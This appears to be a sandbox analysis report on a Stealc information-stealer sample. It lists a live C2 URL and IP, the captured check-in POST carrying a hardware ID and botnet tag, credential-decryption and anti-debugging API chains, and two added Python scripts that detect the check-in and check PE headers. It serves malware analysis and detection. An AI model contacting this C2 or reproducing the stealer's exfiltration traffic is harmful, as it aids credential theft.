
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523618
MD5: ed976a68fbf288f214e53f8ee4734fcc
SHA1: a67a4f8e2e21d8d8721a7eafdb2a13655854e4f1
SHA256: 538f1b2469163b43d505e8d7f15b9618fc25834aa3b2ebe3f452b120120250cd
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5776 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ED976A68FBF288F214E53F8EE4734FCC)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author)

PCAP (network traffic):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Memory dumps:
00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2039233815.0000000005340000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5776 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5776 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Unpacked PEs:
0.2.file.exe.fe0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
                No Sigma rule has matched
Suricata IDS alert (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
2024-10-01T20:54:59.674785+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:49704 | 185.215.113.37:80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.fe0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEF68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 36 34 32 46 41 44 42 45 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a
Data Ascii:
  ------DBGHJEBKJEGHJKECAAKJ
  Content-Disposition: form-data; name="hwid"

  2B642FADBE1E2643095942
  ------DBGHJEBKJEGHJKECAAKJ
  Content-Disposition: form-data; name="build"

  doma
  ------DBGHJEBKJEGHJKECAAKJ--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (listed 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE6280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and multipart body as the global-traffic POST listed above)
Source: file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/H
Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1
Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpQ
Source: file.exe, 00000000.00000002.2081293607.0000000001862000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe
Source: file.exe, 00000000.00000002.2081293607.0000000001847000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/t1
Source: file.exe, 00000000.00000002.2081293607.00000000017EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37Tz
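The POST captured in this section is the Stealc check-in: a multipart/form-data body with two fields, hwid (a hardware identifier) and build (the botnet tag "doma", matching the extracted configuration), sent to the .php endpoint from the configuration and without any User-Agent header. The script below is an added example, not part of the Joe Sandbox report and not Stealc code: it decodes the Data Raw hex dump shown above, parses the multipart body using the boundary from the Content-Type header, checks the body length against Content-Length, and applies a simple check-in heuristic. The header dictionary and field names are copied from the capture; the heuristic itself (POST to a .php path, no User-Agent, exactly the hwid and build fields) is this example's own assumption, not a Joe Sandbox or Suricata rule.

```python
import re

# Body of the captured POST, copied from the "Data Raw" hex dump in the report above.
RAW_BODY_HEX = """
2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
32 42 36 34 32 46 41 44 42 45 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a
2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a
64 6f 6d 61 0d 0a
2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a
"""

# Request line and headers as captured (note: there is no User-Agent header at all).
OBSERVED_METHOD = "POST"
OBSERVED_PATH = "/e2b1563c6670f193.php"
OBSERVED_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ",
    "Host": "185.215.113.37",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}


def decode_hex_dump(dump: str) -> bytes:
    """Turn a space/newline separated hex dump into raw bytes."""
    return bytes.fromhex(dump)


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value as str}."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary parameter")
    delimiter = b"--" + m.group(2).encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # "--<boundary>--" closes the body
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                         # malformed part without a header/body split
        name = re.search(rb'name="([^"]*)"', head)
        if name is None:
            continue
        if value.endswith(b"\r\n"):          # the CRLF before the next delimiter is not part of the value
            value = value[:-2]
        fields[name.group(1).decode("ascii")] = value.decode("utf-8", errors="replace")
    return fields


def is_stealc_checkin(method: str, path: str, headers: dict, fields: dict) -> bool:
    """Heuristic chosen for this example (not a Joe Sandbox or Suricata rule): a POST to a
    .php endpoint with no User-Agent and a multipart body made of exactly hwid and build."""
    low = {k.lower(): v for k, v in headers.items()}
    return (
        method == "POST"
        and path.lower().endswith(".php")
        and "user-agent" not in low
        and low.get("content-type", "").startswith("multipart/form-data")
        and set(fields) == {"hwid", "build"}
    )


def analyze_capture(method: str, path: str, headers: dict, body_hex: str) -> dict:
    """Decode the body, compare it with Content-Length, extract the fields, apply the heuristic."""
    body = decode_hex_dump(body_hex)
    declared = int(headers.get("Content-Length", "-1"))
    fields = parse_multipart(body, headers["Content-Type"])
    return {
        "body_length": len(body),
        "length_matches_header": len(body) == declared,
        "fields": fields,
        "stealc_checkin": is_stealc_checkin(method, path, headers, fields),
    }


if __name__ == "__main__":
    for key, value in analyze_capture(OBSERVED_METHOD, OBSERVED_PATH, OBSERVED_HEADERS, RAW_BODY_HEX).items():
        print(f"{key}: {value}")
```

Decoding the hex gives exactly the 211 bytes the Content-Length header announces, and the two extracted fields are the values Suricata's check-in signature (SID 2044243 above) keys on; the hwid value is what ties later exfiltration POSTs from the same host together on the C2 side.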

                System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AA0A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BB8F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AE262
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013B324A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01472296
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AFD4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AAC7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BDC46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012E7CB4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013B675F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013B179C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01382F8B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AC786
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0146A67E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BEE9B
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00FE45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: sixuqxru ZLIB complexity 0.9947944303365677
Source: file.exe | Static PE information: Entry point disassembly: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: file.exe, 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2039233815.0000000005340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0BQY61N2.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1844736 > 1048576
Source: file.exe | Static PE information: Raw size of sixuqxru is bigger than: 0x100000 < 0x19c400
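The static PE findings in this report (blank and non-standard section names, a sixuqxru section with raw size 0x19c400 and ZLIB complexity 0.99 here, and in the Data Obfuscation section below the entry point in .taggant, the stored checksum 0x1cfe12 that should be 0x1cd2d5, and section entropy 7.95) can all be reproduced from the PE headers alone. The script below is an added example, not Joe Sandbox code, using only the Python standard library: it recomputes the PE checksum with the CheckSumMappedFile algorithm, measures per-section Shannon entropy, flags writable+executable sections, and finds the section that holds the entry point. It runs on a PE32 skeleton constructed inline for the demonstration (not the analyzed file; the only value borrowed from the report is the stored checksum 0x1cfe12, which cannot match the skeleton). The set of "standard" section names and the 7.0 bits/byte entropy threshold are this example's own assumptions.

```python
import math
import struct

# Section names treated as "standard" for the entry-point check (the example's own list).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".crt"}
HIGH_ENTROPY = 7.0                 # bits per byte; assumption, packed/encrypted data usually scores above 7
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def pe_checksum(data: bytes) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum the way CheckSumMappedFile does: ones'-complement
    sum of the file as little-endian 32-bit words, skipping the CheckSum field itself, folded to
    16 bits, plus the file length."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    checksum_off = e_lfanew + 4 + 20 + 0x40      # signature + COFF header + offset in optional header
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:                   # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def shannon_entropy(blob: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Read the header fields the checks need; PE32 and PE32+ share these offsets."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, opt + 0x40)[0]
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + size_opt + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars,
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})
    return {"entry": entry, "stored_checksum": stored, "sections": sections}


def analyze(data: bytes) -> dict:
    """Produce the report-style static findings: checksum, section names, entropy, W+X, entry section."""
    pe = parse_pe(data)
    computed = pe_checksum(data)
    findings = []
    if computed != pe["stored_checksum"]:
        findings.append(f"invalid checksum: real 0x{pe['stored_checksum']:x} should be: 0x{computed:x}")
    entry_section = None
    for s in pe["sections"]:
        if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']!r}")
        if s["entropy"] > HIGH_ENTROPY:
            findings.append(f"high-entropy section: {s['name']!r} ({s['entropy']:.2f} bits/byte)")
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"writable and executable section: {s['name']!r}")
    if entry_section not in STANDARD_SECTIONS:
        findings.append(f"entry point lies outside standard sections: {entry_section!r}")
    return {"checksum_ok": computed == pe["stored_checksum"], "computed_checksum": computed,
            "entry_section": entry_section, "sections": pe["sections"], "findings": findings}


def build_sample_pe() -> bytes:
    """Constructed PE32 skeleton for the demonstration (not the analyzed file): '.text' plus a
    writable+executable '.taggant' holding the entry point and a high-entropy payload."""
    buf = bytearray(0x500)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)                      # e_lfanew
    pe = 0x40
    buf[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HH", buf, pe + 4, 0x014C, 2)              # Machine=i386, NumberOfSections=2
    struct.pack_into("<HH", buf, pe + 20, 0xE0, 0x0102)          # SizeOfOptionalHeader, EXECUTABLE_IMAGE|32BIT_MACHINE
    opt = pe + 24
    struct.pack_into("<H", buf, opt, 0x10B)                      # PE32 magic
    struct.pack_into("<I", buf, opt + 16, 0x2010)                # AddressOfEntryPoint, inside .taggant
    struct.pack_into("<I", buf, opt + 0x40, 0x1CFE12)            # stored CheckSum, wrong on purpose
    table = opt + 0xE0
    headers = [(b".text", 0x1000, 0x200, 0x200, 0x60000020),     # code|exec|read
               (b".taggant", 0x2000, 0x100, 0x400, 0xE0000020)]  # code|exec|read|write
    for i, (name, va, rawsize, rawptr, chars) in enumerate(headers):
        struct.pack_into("<8sIIIIIIHHI", buf, table + 40 * i, name, 0x1000, va, rawsize, rawptr, 0, 0, 0, 0, chars)
    buf[0x400:0x500] = bytes(range(256))                         # every byte value once: entropy 8.0
    return bytes(buf)


if __name__ == "__main__":
    for line in analyze(build_sample_pe())["findings"]:
        print(line)
```

Run against the real sample, the same code reports the checksum mismatch in the report's own wording and lands the entry point in .taggant; the high-entropy check is what the report's ZLIB-complexity and entropy rows measure from two directions.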

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.fe0000.0.unpack | section rights: (blank):EW; .rsrc:W; .idata:W; (blank):EW; sixuqxru:EW; exgbaerq:EW; .taggant:EW vs (blank):ER; .rsrc:W; .idata:W; (blank):EW; sixuqxru:EW; exgbaerq:EW; .taggant:EW (the first, unnamed section changes from ER to EW)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cfe12 should be: 0x1cd2d5
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: sixuqxru
Source: file.exe | Static PE information: section name: exgbaerq
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0143E142 push 72FD8CA7h; mov dword ptr [esp], eax (at 0_2_0143E192)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0143E142 push 48B58678h; mov dword ptr [esp], eax (at 0_2_0143E1C3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01375900 push ebx; mov dword ptr [esp], edi (at 0_2_0137592A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01375900 push ebx; mov dword ptr [esp], 66807FE3h (at 0_2_0137596E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014AA13F push ebp; mov dword ptr [esp], eax (at 0_2_014AA198)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01456939 push 03149145h; mov dword ptr [esp], ebp (at 0_2_0145699F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013819A4 push ebp; mov dword ptr [esp], ecx (at 0_2_01381A04)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013819A4 push eax; mov dword ptr [esp], edx (at 0_2_01381A18)
